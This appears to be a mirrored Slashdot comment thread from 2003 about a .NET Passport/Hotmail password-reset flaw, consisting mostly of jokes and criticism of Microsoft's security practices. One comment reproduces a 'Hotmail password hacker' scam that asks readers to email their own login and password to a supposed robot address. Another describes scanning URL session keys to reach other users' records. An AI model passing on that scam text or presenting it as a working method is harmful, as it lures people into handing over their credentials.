Slashdot Mirror
Security Vulnerability in Microsoft .NET Passport
Stuart Moore writes "A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. The simple flaw allows an attacker to change any person's password to an arbitrary value. The attacker can then gain access to the victim's accounts, as well as to the victim's personal information (if any is stored w/ Passport). Muhammad Faisal Rauf Danka posted a note to the Full-Disclosure security e-mail list after multiple unsuccessful attempts to contact Microsoft." There's a news report as well.
Remember folks, this is Trustworthy Computing! ;-)
Ahhh! I have to go change my Passport profile and take out all those redit cards I added, and transport those top-secret, mission critical emails and documents I have sitting in my Hotmail account!
/obvious
Why did I trust Microsoft with all of my personal secrets? They've had such great security in the past...
...This could be a good thing for me. Back in the day, I had a really cool hotmail address, but I neglected it for a while and completely forgot the password. Since all my info was fake, I couldn't request a new password. Off to steal my own account....
Er, already fixed. I get a 404 error when I go there (with appropriate e-mail addresses).
"Population 1,656"
In other news, the world is round, Bill Gates is rich, twice two is four, and the England cricket team haven't won anything.
The depressing thing is, it's such a simple exploit...
Oh dear. When are people going to start *thinking* before they add usability features to web services willy-nilly...? Hopefully at least the fact that this is so high-profile will make others think hard about their own password-resetting systems.
When I was working on an e-commerce site, I remember us all sitting around spending literally hours plotting out exactly what who would be able to do what with it. It's just commonsense, surely?
Thank the lord for POP ;)
We are secure! There are no security issues in our code. Truly. We shall beat Linux with our shoes and call it a donkey!
unsuccessful attempts to contact Microsoft.
It's not their fault Outlook kept crashing, right?
"I only speak the truth"
Karma: null(Mostly affected by an unassigned variable)
Holy Crap!
.NET, there's only one degree of seperation between me and evil crackers.
If someone were to break into my Hotmail account they would find out all the secret ways that I make my penis and breasts larger.
With
-B
"...the victim's accounts..."
;)
It's nice to see people are finally realising that Passport/Hotmail users are victims.
Nevrar
A remote user can change an arbitrary target user's password to an arbitrary value and then access the target user's account
But that spam is personal to me. It's not for anyone else.
Summation 2
"A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. "
.NET Passport means. I only know Hotmail said: .Net
.Net is all about (including MS). Visual Studio .Net is the only branded .Net product out there, and Hotmail is supposed to be on .Net, whatever that means.
I fail to u'stand what Microsoft
In 1999: Login to Hotmail
In 2000: Login to Passport
2001 and later: Login to
Nobody seems to know what the hell
Is Passport or Passport.Net used by any other service except Hotmail? Terribly confusing.
If you keep throwing chairs, one day you'll break windows....
Too bad this was caused by a blatant underestimation of the power of curious users. If I had ever used the feature, I would have picked it up instantly.
Job? I don't have time to get a job! Who will sit around and bitch about being broke and unemployed then?
Instead if you're a legitimate user who's forgotten their password you're now f*cked. *sigh*. Nice to know things have improved then...
All those l33t hax0r can now stop asking how to hack hotmail. The answers right here (if it wasn't 404'd)
Rus
Cheap UK and US VPS
Perhaps we can take this opportunity to kill all those spam accounts on hotmail. All we need to do is reset all the passwords to impossible strings...
Sounds like a really tough fix... Delete the offending page... "There, see, its secure."
While most geeks take at least some "delight" in vulnerabilities (even outside M$ vulnerabilities), the fact that we keep seeing stupid programmer tricks from M$ employees should be a comforting factor to DRM detractors. Even if M$ manages to get DRM out there, how riddled with holes will it be? If it is constantly circumvented, does anyone think suppliers will use it (DMCA-type laws notwithstanding)?
And with this being a web-"exploit", it makes the DRM-circumvention idea more interesting since all of the verification will be done online.
Constant vulnerabilities == no real DRM.
Mind the gap...
Sure, *this one* is fixed, but it sure doesn't inspire confidence in the security of their service. Who knows if there are other holes left for crackers to exploit...
Tsunami -- You can't bring a good wave down!
Sooner or later they'll start blaming users for providing personal information, and excusing websites and companies from security flaws.
My neighbor's
victim@hotmail.com or attacker@attacker.com is going to be really pissed...
You expect security from a company with one of the worst track records in the industry? Ha!
The problem with Microsoft (and the majority of other IT firms) is that there is no PROACTIVE auditing. I think that every company should conduct OpenBSD-style code audits before they release software. This would cut down dramatically on the number of incidents like this.
And eventually, we will see a similar exploit on Sun's Liberty system as well.
The whole single sign on concept is flawed at present. Far too many potential holes, no matter what the tool, or who the builder.
fixed? they disabled resetting of passwords... that is a quick hack to stop the bleeding, but it does not get around the real issue of poor design. is it that hard to acutall think about what kind of input can come ina query string, and what should be done with it? arent they supposed to be professionals? i learned about this in a CS course, and i couldnt help thinking, "duh, any sensible person wouldnt be that stupid..." obviously i was wrong.
Fixed does not mean simply 404ing the offending page. There are many legitimate users now who cannot change their passwords. This is a cheap hack while they work out what the fsck to do about the real problem.
Bob
Listen to my latest album here
You could freak out with all his credit cards! Assuming he's got a good credit rating though :-(
If you keep throwing chairs, one day you'll break windows....
Microsoft make an interesting interpretation of RFCs by accepting all mail to postmaster@ but only insofar as to send an automatic response saying your message will not be read.
This guy also says he tried to email them ten times and never got further than automagic autoreplies. Do they actually have a procedure to inform them when things are broken?
Its kindof important to remember that this exploit has been out in the wild for a loooooong time. I can imagine Danka is going to have a lot of pissed of h4x0rs who are going to want their exploit back.
~would this be the prime example of a security hole being called a feature?~
[Fuck Beta]
o0t!
There is an outlined procedure for this sorta thing...
In the event a user discovers an exploit, inform user to reboot machine and it will go away.
But seriously, there seems to be no OFFICIAL way for end users to actually contact microsoft, nor any sorta automated system to rank e-mails based on importance, nor any human within the phone network who actually knows who to talk to. People who i've known that worked there also have no clue as far as who to talk to, and admit this if you're lucky. If you are unlucky, just say it's a vender issue without thinking the vender is Microsoft.
There is no sanctuary. There is no sanctuary. SHUT UP! There is no shut up. There is no shut up.
Since the report wasn't very descriptive, I was hoping someone could enlighten me. I would assume that since they don't ask you to provide your old password to change it, this is a method for users who forgot their old password to get it reset to some random password that Microsoft gave, and have it sent to an email that the user provided from the website.
.NET? (assuming it's non-hotmail)
So couldn't Microsoft simply fix this by having the email sent to the person's email address they provided when they registered with
"You had this look that of an angel, it was such a bad disguise" --Dishwalla
The vulnerability seems to return a 404 - so it seems hotmail have taken notice after all - even though it took a /. to make them notice.
Yet another reason to be glad I ditched my Hotmail account and refuse to use Passport after Hotmail 'politely' informed me that my last name (the one I was born with) violated their offensive language filter and asked me to change my last name.
secure@microsoft.com
I agree completely.
I spent a year on contract developing a product, web based (on Unix), which allowed users and managers spend budgets as allocated by management in real time and I spent 3 doing just planning and develping the auth system (as it has company/office/team/user levels (user@team.office.company for the username) it was addmittedly a little more complex than your average auth system).
In the end the system has a really solid auth system everything is authenticated and when you try and actually make a transaction there is a multi tiered system that checks budget approval at user, office, team and company level.
It required mind numbing discussions again and again to get it done but it was resolved in the end. I'm glad the projects over though, repeately explaining why it was nesseary to take a long and stable and secure approach (rather than a quick hack approach) to non technical people is very draining (their simple approach, though the wouldn't admit it if you asked them, was actually 'hack it together as quickly as possible', which is what a lot of competitors had done, which is why they had such poor systems, which is why this company was started).
I utterly, utterly dispair when I see cgi scripts that don't have a decent authentication mechanisim. With rare exception (along the lines of everybody makes mistakes) it's just incompotence, there are simply people out there who really should not design or impliment systems or write software (even CGI's).
I am a big fan of the slow, methodical, planned, discussed and documented approach to development.
The previous exploits for hotmail were poor, but I recall that at least of one of them was due to an error error that I can empathise with to some extent (it wasn't as blatant), but I am stunned at the level of ineptitude shown by this particular exploit, but I know the same stupid mistakes are repeated all over the place...
From the passport.net page, in a big green box, under the title "SECURITY", it reads:
.NET Passport uses powerful online security technology and follows a comprehensive privacy policy to help protect your profile information. You manage your information-sharing options.
Sign in on any computer that has Internet access.
Personally I suggest everyone reading this makes sure to tell everyone they know, in order to stop people blindly trusting any incompetents. The fact that it's MS just makes the schadenfreude better.
Justin.
You're only jealous cos the little penguins are talking to me.
This security vulnerability, and the accompanying quick fix, seem to actually enforce Microsoft's touted concept of centralized computing and services.
Think about it, with a company like Microsoft, there is no doubt vulnerabilities will exist. If this was a distributed product we would still have script kiddies years from now drilling on this exploit. Now that it is a centralized service, it has been fixed in one place before any substantial damage has been done. -- Which evil do you want today?
There really does seem to be no difference between someone who cannot read and someone who does not. Those that can read wouldn't be caught using MS-Passport. Sadly, signal can be drowned out by noise coming from a colossal marketing blitz to last through september.
We'll see if they last that long. Windows2003 seems to be more of a push to get users over to OS X or Linux. Their other (2nd of 2) cash cow, the new MS-Office has already been postponed and seems to be more of an incentive to move to OpenOffice than to upgrade.
Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
This is not a new thing, this has been around for a while.
It is about time somebody tried to bring this to light. But i really doubt he "discovered" something that has been known about for a while.
Don't believe me? Do a search on kazaa for hotmail passwords. You will find several txt/doc's with these or similiar instructions.
I Encrypt My IM's
But seriously, there seems to be no OFFICIAL way for end users to actually contact microsoft, nor any sorta automated system to rank e-mails based on importance, nor any human within the phone network who actually knows who to talk to.
Tell me about it. When IE5 first came out (with the modular installer) the installer had a nasty bug: If the FTP site it tried to connect to to download a CAB was full, it would create the CAB file which would contain no data, only the error message!
As one might expect, this would cause the installation to bomb, and no explanation would be given to the user. Attempting to resume the installation would also fail. The solution was, of course, to go into the installer's temp directory and delete the bad CAB files and re-download them, but most users wouldn't know where to find them, and would be forced to start from scratch.
When I attempted to contact Microsoft about the problem, they asked me for a credit card number. When I explained I didn't want support and was trying to report a bug, I was transferred to someone else who... asked me for a credit card number. Wash, rinse, repeat.
What part of "shall not be infringed" is so hard to understand?
He sent them to, amongst others, abuse@hotmail.com. This is the place that they will get mails from everyone complaining about a spammer etc - it's like receiving the wrong order from Amazon and sending an email to hostmaster@amazon.com, then flaming them for taking so long to respond.
Passport Security Issue. MS was listening, Muhammad Faisal Rauf was just too impatient. Probably just wanted credit as being "kewl," or something.
You seem to be under the the impression that legitimate users actually change their passwords - what planet are you living on?!
Mechanic: We fixed your brakes... they no longer make that awful screeching sound.
Me: Thanks. How did you fix them?
Mechanic: We removed the brakes entirely
Me: What the...
Mechanic: That will be $567.98, please.
I take drugs seriously.
It seems that all Passport Update Services have been disabled, owing to millions of user complaints about spam! All mail accounts will need to be checked manually for spam. (all software MS Junk mail filters etc. have been junked already).
.Net will be re-activated.
Of course, this means that Full Control of user accounts is needed. The process of manually cheking every single mail account for spam is underway. When all the billion accounts are checked and spam deleted, Passport
This is the beginning of the Passport Update Synchronized Service Year (PUSSY) efforts. Thanks for your attention.
If you keep throwing chairs, one day you'll break windows....
Hotmail password hacker.doc
THIS IS HOW TO HACK ANYONE'S HOTMAIL PASSWORD
Step 1:
send a mail to Robot_pass_finder@hotmail.com with PW: fetchpass in the subject line
Step 2: The email body
In the first line: put the complete email address of the user whose password you want.
In the 5th line, type the email address and the login (pass) you want the password sent to,
here is an exemple:
To: Robot_pass_finder@hotmail.com
Subject: PW: fetchpass
CC.________________ BCC.___________________
=-email body-=
address@hotmail.com
your email adress here example.: myemail@hotmail.com
your pass here example.: mypassword
"Live Free or Die." Don't like it? Then keep out of the USA
One Company to rule them all
One Hacker to find them
One Exploit to bring them all
to the attacker's power
Beware: In C++, your friends can see your privates!
On a web page which managed HR information, so you could log in, check the session key in the URL and then simply scan through nearby numbers to find and update all sorts of things about other logged in people.
'Twas a highly expensive piece of software as well...
Government of the people, by corporate executives, for corporate profits.
As of 6:30AM 5/8/2003 password reset ability works on passport.com.
For non-Hotmail e-mail addresses there exists an option to receive change instructions by e-mail. The URL that's generated on those pages is similar to the one in the exploit, yet entering "attacker" address other than "victim" address doesn't result in an e-mail sent. If the two addresses in the URL match that on the account the e-mail appears to be sent.
Looks like they indeed patched, although there should't be two addresses in the URL or even better, they shouldn't be passing them in URL at all.
Robert Babcock.
Y AC :www.animemusicvideos.org/members/linkprobview.php %3Fdownload_id%3D1442+Robert+Babcock+ashyukun&hl=e n&ie=UTF-8).
Do a search for Ashyukun on google.(www.nhmk.com/nes/ )
also at
(http://216.239.33.104/search?q=cache:q1XY1gcmA
Consider yourself lucky you don't have to deal with hotmail. Hmm.. what do guys with names like Dick Cheney do?
I usually stand up for the Redmond boys if there's some bashing going on and not alot of balance to the issue. But this is just an incredibly stupid hole to have open. Why would you ever, ever, ever pass details in the URL string that the user himself need not (and should not be allowed to) supply? If it is because you are passing it among servers in some fancy-schmancy web service scheme, then at least have the decency to hide the exploitable name/value pair in an http header or something (but even this should not be necessary for what they are doing , even if my guess as to how their backend works is wayyy offbase). Somebody said it earlier in the discussion that it is because developers (using the term lightly) add features without thinking of how to do it right and how to do it securely and just pass any old thing in the URL string, and they were right on the mark.
Some coders (again using the term loosely) at my organization used to do this absolutely all the time and I would bitch about how piss poor it was from a security angle (and regularly demonstrate how easy it was to circumvent the intended "security" mechanisms). Everybody laughed at me when I did... that is until one of our largest customers hired an outside firm to audit the "security" of the apps they were getting. It took the firm very little time to discover these nuggets, of course. It is interesting to note that they reported that the application security was among the poorest they had seen, but that the server configurations (my department) were among the tightest. The sad thing is the stupid customer basically thought the two canceled each other out, threw some extra money at redesigning the application to meet the standards it should have to begin with, rewarded our systems team which had done it right the first time with absolutely squat, and renewed the contract for another five years. Shows you how much the corporate world understands what's really going on.
Can I bum a sig? I left mine at the office.
After months of trying to understand Microsoft's situation (Windows XP Shows the Direction Microsoft is Going), I came to the conclusion that the Microsoft management style leads to mountains of sloppy code that is difficult to maintain. That's the only theory that seems to fit. For example, in Internet Explorer browser alone, there have been for years more serious security bugs than Microsoft fixed. There are, at present 14 security vulnerabilities.
Here is the recent record. The list of defects has been similar for years. Also, this is a record only of security defects, not all defects:
- June 18, 2002: 18 vulnerabilities
- August 8, 2002: 22 vulnerabilities
- September 9, 2002: 19 vulnerabilities
- November 19, 2002: 32 vulnerabilities
- December 9, 2002: 19 vulnerabilities. (Microsoft fixed 15 on Nov. 20, but
two new ones were found.)
- May 8, 2003: 14 vulnerabilities
This is a terrible record for a company that has $52.9 billion in the bank. (See "Total Current Assets" in the upper left hand corner, which is the money available within the next few months. It takes time to spend a billion dollars, so the next few months is equivalent to cash.)Obviously, Microsoft could fix the bugs if the company wanted to fix them. But the company apparently lacks the will to devote the resources necessary (IE still does not have tabbed browsing), and apparently also, it is not easy.
This may be a naive question, but how do I go about closing a .Net Passport account? I want Microsoft to remove all of my personal information from their servers.
There seems to be no way to do this online. A call to MS customer service resulted in an "I dunno, I can't do that." answer.
btw, I'm not dumb enough to actively participate in Passport. I bought something online last summer from a small company, and after completing the purchase, I was shocked to see that Microsoft was handling the transaction with Passport. Damn it! Now they have my credit card info, shipping address, etc. Guess I should have read the fine print before I clicked Sumbit...
Anyone successfully done this?
So if I am an ISP and I have a hole in my service is unplugging the server a fix?? that is basically what they did. Now its the right thing to do (make sure nobody can chage **until** you have it fixed..
I need to make some stupid friends, it seems. Well, friends who are more stupid than the ones I have now, at any rate.
But it's a good exploit, anyway. Kudos to the person who slaved for almost 15 minutes to figure it out (that's not a slander against the cracker in question, but against the pathetic sec- . . . secuuu- . . . jeez, I can't even call it what MS wants me to think it is).
Do not touch -Willie
Yes, in fact if you log in and go to your profile, there's a link in the bottom left hand nav that says "CLOSE .NET PASSPORT ACCOUNT"
You click on that, agree to their terms and close your account right there in three clicks.
Goodluck
Does the word 'damage control' mean anything to you?
404ing the page took them 2 minutes, and now all users are relatively secure again. If Microsoft had done nothing while they fixed the bug, several million hotmail accounts would still be vulnerable, and would probably stay that way for atleast a few hours.
If you've made any study of it at all you know that effective security results from a process that starts before the software is even written. There is no protocol that will save you from logic errors (like the latest Passport hole). To do this reqires a good understanding by the devs of security and their adherence to design principles and coding practices. To do that you need a software development methodology that enforces the consistent application of those priciples and practices. Therein lies the problem.
In my little corner of MS (though by all accounts it was typical of the company as a whole) what was prized above all was meeting requirements and deadlines. Virtually no energy was put into the development environment (hence the hour I spent every morning just downloading the nightly build, the insane .bat scripts, constantly fixing my own NT install as a $55/hr contractor). Nobody got "c-hours" for making life easier. More importantly, there was little value placed on design, good technique. Lip service was paid in meetings and reviews, of course, and superficial style details received obsessive scrutiny. Code reviews often bogged down on correct hungarian notation but a unit test consisting of "return true" was perfectly ok. The "heros" were people with big brain muscles who spent nights and weekends hammering out code to meet the latest deadline.
The result of all this was a coding culture that I called the kingdom of cut-and-paste. I was actually encouraged to write routines by starting with someone else's routine to do something unrelated and edit it to do my task. A colleague would stand over my shoulder browsing the codebase looking for something convenient to steal. It was a shock to realize how little code people actually wrote. This is one of the things that I hated about working there, that I spent so much of my time fscking with the various APIs, incomprehensible include file heirarchies and so little time writing C++.
Well, in my Intro to Fortran class in '77 the prof explained why massive code duplication is a bad idea, and the results are visible in every MS product. You can't fix a bug in one place, you have to fix it every place it got copied to, and you don't know where those are. The codebase is now on the order of 100'sM lines or better? Probably not even MS has a good handle on this, because they can't know for sure how much duplication (with tiny variations) there is (clue: lots).
Once a company grows to a considerable size it's really hard to change the culture. I've seen this at several startups. MS is like a battleship or an aircraft carrier. High-tech and deadly but turning that boat around is really hard and simply may not happen in a short distance. Expecting them to change their performance WRT security in a few months (or year) is kind of like expecting the old Soviet apparatchiks to start respecting civil liberties and human dignity because the Central Comittee sends out a memo. Good luck. It's a city unto itself in Redmond, its own little world. And even if you did, what the hell are you going to do about the millions of lines of (largely incomprehensible) code in the installed base? The millions of systems in the wild that are unpatched and unmaintained?
I see many of the same disasters being recapitulated in .NET. They may talk security and I'm sure they're trying hard but I expect that their long term strategies are going to rely more on legislation than the (probably impossible)
task of bringing their products t
A: You're way off about changing peoples' approach. The sad fact is people like that are in pain-avoidance mode. Give them pain. Give them a productive way to avoid the pain. There must be code review. One guy does a little coding, another guy has to sign off on it. A third has to sign off that it has been tested (whether or not any testing actually happens is not important). All three get burned if anything bad happens: after-hours or weekend work to fix it NOW? The rate of code churn goes down, and the quality goes up. Grumbling goes up, but it sounds like a personal problem to me... :)
B: You're dead-on-target about doing other people's work. You can't have individual effort and collective accountability. You have to have collective work and collective accountability. Oh, and if you're smarter than others: the sharpest knife always gets used the most. Adjust to it. One day you will be enlightened.
C: You are dead-on-target about the financial sector :). That does not mean it won't work in hospitals or law offices though. It just means *somebody* has to fulfill the role of irate customer when the slackers need it.
Culture is not something you create at the water cooler or in seminars. It is dictated by the unique combination of supply and demand wherever you are. You can change the supply (of people or other resources), or the demand. The boss/team-leader mediates customer demand and needs to have some real power over the programmers in the same way that customers have real power to affect the company's bottom line. If you lack accountability, that isn't a software development problem. You're just going to get shoddy results, software security, housekeeping, everything included.
The moral of the story: accountability is security. So, if you want a culture of security, improve your accountability! It has positive potential for Maslow's "self-actualizer" types too.
--- Nothing clever here: move along now...